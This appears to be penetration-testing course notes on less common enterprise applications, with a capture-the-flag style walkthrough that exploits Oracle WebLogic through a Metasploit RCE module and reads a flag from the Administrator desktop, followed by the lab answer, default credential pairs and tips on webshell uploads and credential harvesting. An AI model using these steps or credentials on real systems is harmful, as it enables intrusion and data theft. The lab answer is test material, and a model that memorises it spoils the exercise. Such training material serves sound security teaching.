🎯 Objective: Reference guide for additional applications commonly encountered during penetration tests with their attack vectors and default credentials.
Beyond the main applications covered in this module, penetration testers encounter many other applications in enterprise environments. This reference covers common vulnerabilities, default credentials, and attack techniques for frequently seen applications.
Question: "Enumerate the target host and identify the running application. What application is running?"

```shell
# Standard enumeration
nmap -sV -sC target
# Expected: WebLogic server identification
```

Question: "Enumerate the application for vulnerabilities. Gain remote code execution and submit the contents of the flag.txt file on the administrator desktop."
```
# Launch Metasploit
msfconsole -q
# Use WebLogic RCE module
use multi/http/weblogic_admin_handle_rce
# Set target options
set RHOSTS STMIP
set SRVHOST PWNIP
set LHOST PWNIP
# Execute exploit
exploit
# In Meterpreter session:
cat C:/Users/Administrator/Desktop/flag.txt
```

Answer: w3b_l0gic_RCE!
Apache Axis2:
- Description: Web services framework (often on Tomcat)
- Attack Vectors: Default admin credentials, AAR file upload
- Default Creds: Check vendor documentation
- Exploitation: Upload webshell via AAR service files
- Tools: Metasploit modules available
IBM WebSphere:
- Description: IBM Java EE application server
- Attack Vectors: Default credentials, WAR file deployment
- Default Creds: system:manager
- Exploitation: Deploy WAR files for RCE
- CVEs: Many deserialization vulnerabilities
Oracle WebLogic:
- Description: Oracle Java EE application server
- Attack Vectors: Deserialization RCE, default credentials
- CVEs: 190+ reported vulnerabilities
- Exploitation: Unauthenticated RCE (2007-2021)
- Common Ports: 7001, 7002
Zabbix:
- Description: Open-source network monitoring
- Attack Vectors: SQL injection, auth bypass, RCE via API
- Vulnerabilities: XSS, LDAP disclosure, command injection
- API Abuse: Remote command execution capabilities
- HTB Reference: Zipper box
Nagios:
- Description: System/network monitoring solution
- Attack Vectors: Multiple RCE, privilege escalation
- Default Creds: nagiosadmin:PASSW0RD
- Vulnerabilities: SQL injection, code injection, XSS
- CVEs: Wide variety over the years
Elasticsearch:
- Description: Search and analytics engine
- Attack Vectors: Various CVEs, misconfigurations
- Common Issues: Open instances, data exposure
- HTB Reference: Haystack box
- Ports: 9200, 9300
VMware vCenter:
- Description: VMware management platform
- Attack Vectors: Weak credentials, CVE exploits
- Notable CVEs:
  - Apache Struts 2 RCE
  - CVE-2021-22005 (OVA upload)
- Impact: Often runs as SYSTEM/domain admin
- Platforms: Windows and Linux appliances
Collaboration Platforms:
- Description: Collaboration platforms, internal wikis
- Attack Vectors: Known CVEs, search functionality abuse
- Data Sources: Document repositories, credential discovery
- Common Finds: Valid credentials in documents
DotNetNuke:
- Description: Open-source C# CMS
- Attack Vectors: Auth bypass, directory traversal
- Vulnerabilities: File upload bypass, arbitrary download
- Framework: .NET-based
```shell
# Identify application and version
nmap -sV -sC target
nikto -h http://target
whatweb target
```

```
# Common default combinations
admin:admin
admin:password
system:manager
nagiosadmin:PASSW0RD
```

```shell
# Search for known exploits
searchsploit application_name version
nmap --script vuln target
```

Built-in functionality to look for:
- File upload capabilities
- Command execution features
- API endpoints for automation
- Administrative functions
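One way to turn the scan output above into the application inventory this reference recommends, as an added example that is not part of the original notes: it parses nmap grepable (-oG) output and maps each open port and version banner to the applications listed on this page, so a defender can see at a glance which hosts run software with known default accounts or high-privilege exposure. The banner regexes and the three-host sample scan are constructed assumptions, not real scan data.

```python
import re

# Reference table distilled from this page's entries. Ports are those the page lists;
# banner regexes are assumptions about typical nmap -sV version strings.
APP_SIGNATURES = [
    ("Oracle WebLogic", {7001, 7002}, r"weblogic", "deserialization RCE history; limit console/T3 exposure"),
    ("Elasticsearch", {9200, 9300}, r"elasticsearch", "confirm auth is enforced; open instances leak data"),
    ("Nagios", set(), r"nagios", "default account nagiosadmin:PASSW0RD must be changed"),
    ("IBM WebSphere", set(), r"websphere", "default account system:manager; WAR deployment is RCE"),
    ("Zabbix", set(), r"zabbix", "API can run commands; restrict administrative access"),
]

# One entry in the nmap -oG "Ports:" field: port/state/proto/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/open/tcp//([^/]*)//([^/]*)/")


def parse_grepable(text):
    """Yield (host, port, service, version) for every open TCP port in -oG output."""
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        for m in PORT_RE.finditer(line.split("Ports:", 1)[1]):
            yield host, int(m.group(1)), m.group(2), m.group(3)


def map_applications(grepable_text):
    """Return (host, port, app, note) tuples; the first matching signature wins."""
    findings = []
    for host, port, _service, version in parse_grepable(grepable_text):
        for app, ports, banner, note in APP_SIGNATURES:
            if port in ports or re.search(banner, version, re.I):
                findings.append((host, port, app, note))
                break
    return findings


# Constructed sample scan output for three hosts (not a real network).
SAMPLE_SCAN = (
    "Host: 10.0.0.5 ()\tPorts: 7001/open/tcp//http//Oracle WebLogic Server 12.2.1.4/, "
    "9200/open/tcp//http//Elasticsearch REST API 7.10.2/\tIgnored State: closed (998)\n"
    "Host: 10.0.0.6 ()\tPorts: 80/open/tcp//http//Apache httpd 2.4.41 ((Ubuntu))/, "
    "443/open/tcp//ssl|http//Nagios XI/\tIgnored State: closed (998)\n"
    "Host: 10.0.0.7 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2/\tIgnored State: closed (999)\n"
)

if __name__ == "__main__":
    for host, port, app, note in map_applications(SAMPLE_SCAN):
        print(f"{host}:{port}\t{app}\t{note}")
```

Feed it a real `nmap -sV -oG scan.gnmap` file and extend APP_SIGNATURES with the other entries from this page to keep the inventory in one place.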
- 🔍 Port scanning - Identify all running services
- 📊 Service enumeration - Version and configuration detection
- 🎯 Application mapping - Create comprehensive inventory
- 🔑 Default credentials testing
- 🐛 Known vulnerability exploitation
- ⚙️ Built-in functionality abuse
- 📁 File upload and deployment attacks
- 📄 Document repositories searching
- 🔐 Credential harvesting from files
- 🏗️ Infrastructure mapping via configs
- 🔗 Lateral movement opportunities
Common Attack Patterns:
- 🔓 Default credentials remain unchanged
- 📦 File upload functionality for shells
- 🔧 Built-in features for command execution
- 📊 API abuse for automation and RCE
High-Impact Targets:
- Monitoring systems (network visibility)
- Virtualization platforms (infrastructure control)
- Application servers (web application hosting)
- Document repositories (credential discovery)
Assessment Tips:
- 📋 Always check for default credentials first
- 🔍 Look for file upload functionality
- 📚 Search documentation for API endpoints
- 🎯 Focus on administrative interfaces
💡 Pro Tip: Many enterprises run hundreds of different applications - develop a systematic approach to quickly identify, fingerprint, and test each one. Often the most critical vulnerabilities are in lesser-known monitoring or management applications running with high privileges.